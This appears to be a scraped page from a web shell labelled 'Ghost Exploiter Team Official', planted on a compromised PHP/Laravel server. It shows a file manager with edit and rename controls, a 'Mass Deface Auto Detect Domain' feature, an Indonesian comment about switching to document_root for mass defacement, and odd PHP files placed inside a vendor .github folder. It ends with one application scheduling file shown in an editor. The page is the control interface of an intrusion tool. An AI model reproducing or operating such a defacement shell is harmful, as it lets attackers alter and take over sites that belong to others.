Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
markbaker
/
complex
/
.github
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
workflows
--
ren
ClockInterface.php
0.546KB
edt
ren
PhpExecutableFinder.php
2.416KB
edt
ren
api.php
0KB
edt
ren
auth.php
0KB
edt
ren
console.php
0.36KB
edt
ren
debugbar.php
13.946KB
edt
ren
installed.json
489.396KB
edt
ren
testOperations-20260128
...
0.587KB
edt
ren
testOperations.php
0.587KB
edt
ren
<?php declare(strict_types=1); use Illuminate\Foundation\Inspiring; use Illuminate\Support\Facades\Artisan; use Illuminate\Support\Facades\Schedule; //Artisan::command('inspire', function (): void { // $this->comment(Inspiring::quote()); //})->purpose('Display an inspiring quote')->hourly(); Schedule::everyMinute()->command('app:change-payment-status-by1-c');